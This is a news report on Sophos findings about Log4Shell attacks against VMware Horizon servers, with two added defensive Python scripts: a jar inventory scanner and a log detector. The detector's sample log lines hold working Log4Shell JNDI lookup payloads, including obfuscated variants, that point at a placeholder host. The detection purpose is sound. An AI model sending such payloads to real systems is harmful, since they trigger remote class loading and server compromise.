VMware’s Horizon virtualization platform has become an ongoing target of attackers exploiting the high-profile Log4j flaw to install backdoors and cryptomining malware.
In a report this week, cybersecurity firm Sophos wrote that VMware’s virtual desktop and applications platform has been in the crosshairs since late December, with the largest wave of attacks beginning Jan. 19 and continuing well into March. Many of the attacks are designed to deploy cryptocurrency mining malware, Sophos researchers Gabor Szappanos and Sean Gallagher wrote.
Other motives were less clear, though some of the attacks may be the work of ransomware groups or initial access brokers, who gain access to targeted systems and then sell that access to threat actors who launch ransomware and other malware attacks.
VMware released an updated version of Horizon in late December and has continued issuing Horizon patches this month for the Log4j flaw – called Log4Shell and tracked as CVE-2021-44228 – but the threat continues.
“Attempts to compromise Horizon servers are among the more targeted exploits of Log4Shell vulnerabilities because of their nature,” the researchers wrote. “VMware has pushed out patched versions of Horizon as of March 8 2022, but many organizations may still not have deployed the fixed versions or applied workarounds to vulnerable ones. Even if they have, as demonstrated by the backdoors and reverse shell activity we found, those systems may already be compromised in other ways.”
The Log4j critical flaw exploded onto the scene late last year, with cybercriminals moving in quickly to exploit the vulnerability.
The threat from Log4Shell is significant – Log4j has broad enterprise use in countless servers, cloud-based services and open-source projects like ElasticSearch and Elastic Logstash.
The open-source logging tool is so ubiquitous that it’s difficult for organizations to track down every instance in their IT environments. Log4Shell is also a flaw that is easy to exploit, with hackers only needing a string of malicious code to make their way into systems.
The attacks on Horizon also come as demand for such remote-work tools continues to grow in the wake of the COVID-19 pandemic, which forced most employees to work from home and has ushered in an expected era of more hybrid work.
“Organizations should thoroughly research their exposure to potential Log4J vulnerabilities, as they may impact commercial, open-source and custom software that in some cases may not have regular security support,” Szappanos and Gallagher wrote. “But platforms such as Horizon are particularly attractive targets to all types of malicious actors because they are widespread and can (if still vulnerable) easily be found and exploited with well-tested tools.”
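The difficulty of tracking down every Log4j instance, and the call to research exposure quoted above, both come down to inventory. The following is an added example, not code from the article or from Sophos or VMware: a small Python scanner that walks a directory tree, opens every jar, war, ear or zip it finds (recursing into nested archives such as a war's WEB-INF/lib), reads the log4j-core version from the bundled pom.properties, and reports whether the JndiLookup class is still present. The class path and pom.properties location are the real ones shipped in log4j-core jars; the 2.17.1 review floor and the sample archives it builds in a temporary directory are this example's own assumptions.

```python
import io
import os
import re
import tempfile
import zipfile

# Added example, not the article's or any vendor's code. Assumptions: the class
# path and pom.properties location below are those found in real log4j-core
# jars; the review floor is this script's own policy, not a vendor statement.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
LOG4J_CORE_POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
REVIEW_FLOOR = (2, 17, 1)  # policy assumption: older builds still carrying JndiLookup get flagged


def parse_version(text):
    """Return a comparable (major, minor, patch) tuple from a pom.properties body, or None."""
    m = re.search(r"^version=(\d+)\.(\d+)(?:\.(\d+))?", text, re.M)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def inspect_archive(data, label):
    """Inspect archive bytes; recurse into nested archives (fat jars, WEB-INF/lib)."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings  # not a zip container; nothing to report
    names = set(zf.namelist())
    version = None
    if LOG4J_CORE_POM in names:
        version = parse_version(zf.read(LOG4J_CORE_POM).decode("utf-8", "replace"))
    has_jndi = JNDI_LOOKUP_CLASS in names
    if version is not None or has_jndi:
        findings.append({
            "path": label,
            "version": version,
            "jndi_lookup_present": has_jndi,
            # Unknown version with the class present is treated as needing review.
            "needs_review": has_jndi and (version is None or version < REVIEW_FLOOR),
        })
    for n in sorted(names):
        if n.lower().endswith(ARCHIVE_EXT):
            findings.extend(inspect_archive(zf.read(n), label + "!" + n))
    return findings


def scan_directory(root):
    """Walk a directory tree and inspect every archive found under it."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in sorted(filenames):
            if fn.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as f:
                    findings.extend(inspect_archive(f.read(), os.path.relpath(path, root)))
    return findings


def build_sample_tree(root):
    """Constructed sample: three archive shapes a real scan meets (not real jars)."""
    # (a) old log4j-core still shipping JndiLookup
    with zipfile.ZipFile(os.path.join(root, "log4j-core-2.14.1.jar"), "w") as zf:
        zf.writestr(LOG4J_CORE_POM, "version=2.14.1\n")
        zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    # (b) same old version with the class removed (the class-removal workaround)
    with zipfile.ZipFile(os.path.join(root, "log4j-core-2.14.1-stripped.jar"), "w") as zf:
        zf.writestr(LOG4J_CORE_POM, "version=2.14.1\n")
    # (c) a web app bundling an updated log4j-core under WEB-INF/lib
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr(LOG4J_CORE_POM, "version=2.17.1\n")
        zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    os.makedirs(os.path.join(root, "apps"))
    with zipfile.ZipFile(os.path.join(root, "apps", "portal.war"), "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.17.1.jar", inner.getvalue())


def run_demo():
    """Build the sample tree in a temp dir, scan it, and map path -> (version, jndi, review)."""
    root = tempfile.mkdtemp()
    build_sample_tree(root)
    return {f["path"]: (f["version"], f["jndi_lookup_present"], f["needs_review"])
            for f in scan_directory(root)}


if __name__ == "__main__":
    for path, (ver, jndi, review) in sorted(run_demo().items()):
        print(f"{'REVIEW' if review else 'ok    '} {path} version={ver} jndi_lookup={jndi}")
```

Point `scan_directory` at an application server's installation root; the nested-archive recursion matters because Log4j is usually shipped inside a product's own war or fat jar rather than as a loose file, which is exactly why plain filename searches miss it.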
According to Sophos, the attacks on VMware Horizon that started in January used a Lightweight Directory Access Protocol (LDAP) resource lookup in Log4j to load a malicious Java class file that modified legitimate Java code. That added a web shell which gave the attackers remote access and code-execution capabilities.
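The lookup string that triggers that LDAP resource call lands in whatever Log4j logs, which on a Horizon server includes request headers and parameters. The following is an added example, not code from the article or from Sophos: a Python log scanner, run over a handful of constructed access-log lines, that URL-decodes each line, collapses the simple lookup wrappers commonly used to disguise the literal text, and then reports any line carrying a JNDI lookup and the remote scheme it names. The sample lines and the `lookup.invalid` host are constructed placeholders; the wrapper forms handled are the common ones, not an exhaustive list.

```python
import re
import urllib.parse

# Added example (not Sophos' or the article's code). Assumption: lines are plain
# text access/application logs; wrapper handling covers common forms only.
SCHEMES = ("ldap", "ldaps", "rmi", "dns", "iiop", "corba", "nds", "http", "https")
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(" + "|".join(SCHEMES) + r")\s*:", re.I)

# Collapses ${lower:x} / ${upper:x} / ${x} / ${anything:-x} to the single char x.
_WRAPPER = re.compile(r"\$\{(?:lower|upper)?:?([^${}]?)\}|\$\{[^${}]*:-([^${}]?)\}", re.I)


def normalise(text, max_rounds=10):
    """Undo URL encoding and repeatedly collapse single-character lookup wrappers."""
    text = urllib.parse.unquote(text)
    for _ in range(max_rounds):
        new = _WRAPPER.sub(lambda m: (m.group(1) or m.group(2) or ""), text)
        if new == text:
            break
        text = new
    return text


def scan_line(line):
    """Return the lower-cased remote scheme of a JNDI lookup in the line, or None."""
    m = JNDI.search(normalise(line))
    return m.group(1).lower() if m else None


def scan_log(lines):
    """Return (line_number, scheme, original_line) for every line that carries a lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        scheme = scan_line(line)
        if scheme:
            hits.append((n, scheme, line))
    return hits


# Constructed sample log: one benign request, three lookup attempts in different
# encodings, and a benign line containing an unrelated ${...} token.
SAMPLE_LOG = [
    '10.0.0.5 - - [19/Jan/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [19/Jan/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://lookup.invalid:1389/a}"',
    '10.0.0.9 - - [19/Jan/2022:10:01:09 +0000] "GET /portal/?q='
    '%24%7B%24%7Blower%3Aj%7Dndi%3Armi%3A%2F%2Flookup.invalid%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68"',
    '10.0.0.11 - - [19/Jan/2022:10:01:15 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://lookup.invalid/a}"',
    '10.0.0.12 - - [19/Jan/2022:10:02:00 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (compatible; price ${USD})"',
]

if __name__ == "__main__":
    for n, scheme, line in scan_log(SAMPLE_LOG):
        print(f"line {n}: jndi lookup via {scheme}: {line[:60]}...")
```

A hit here only shows an attempt reached the server; whether the lookup succeeded is better judged from the host side, since a successful exploitation of the kind described above shows up as the Java process making an outbound LDAP connection and then loading class files it did not ship with.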
The initial attacks in late December 2021 and January of this year exploiting the Log4j flaw used Cobalt Strike malware. Other hackers didn’t use reverse-shell software, instead directly targeting the Tomcat server inside of Horizon.
Sophos said it had found a variety of payloads deployed to the targeted Horizon servers. Many were cryptominers, including z0Miner, JavaX miner and at least two variants of XMRig, called the “Jin” and “Mimu” miner bots.
“There were also several backdoors – including the Sliver implant, Atera agent and Splashtop Streamer (both legitimate software products being abused), and several PowerShell-based reverse shells,” the researchers wrote.
“While z0Miner, JavaX, and some other payloads were downloaded directly by the web shells used for initial compromise, the Jin bots were tied to use of Sliver, and used the same wallets as Mimo – suggesting these three malware were used by the same actor.”
There were also a number of backdoors deployed via the Log4j flaw, including some PowerShell reverse shells. The motives of the attackers using the reverse shells were unclear. One Sophos customer was hit by both reverse shells and the Mimu miner, but the researchers said that could be multiple infections by different attackers following initial entry by an initial access broker.
Other cases showed more off-the-shelf backdoors being used to create a persistent presence in the targeted servers. That includes the Sliver implant, which the researchers described as an offensive security tool that was designed to be used by penetration testers and organizations’ red teams for training by mirroring tactics used by cybercriminals. Instead, threat actors use the software in their attacks.
Casey Ellis, founder and CTO at Bugcrowd, told The Register that cryptominers were among the first malicious actors to exploit Log4Shell after it became public.
“It’s a relatively simple and low-risk attack that works best with a large number of vulnerable endpoints in the attack surface,” Ellis said. “Cybercriminals are businesses in their own right, and combining cryptomining as a criminal monetization technique with a vulnerable package and the ubiquity of Log4j makes perfect sense.
“The primary consequences for an organization are CPU resource shortages caused by mining activity and, for those using the cloud, an unexpectedly high usage bill.”
In addition, because such attacks are simple to carry out, the threat actors using cryptomining range from individuals through ransomware-as-a-service gangs, initial access brokers and nation-states, which use cryptomining as a financing tool. ®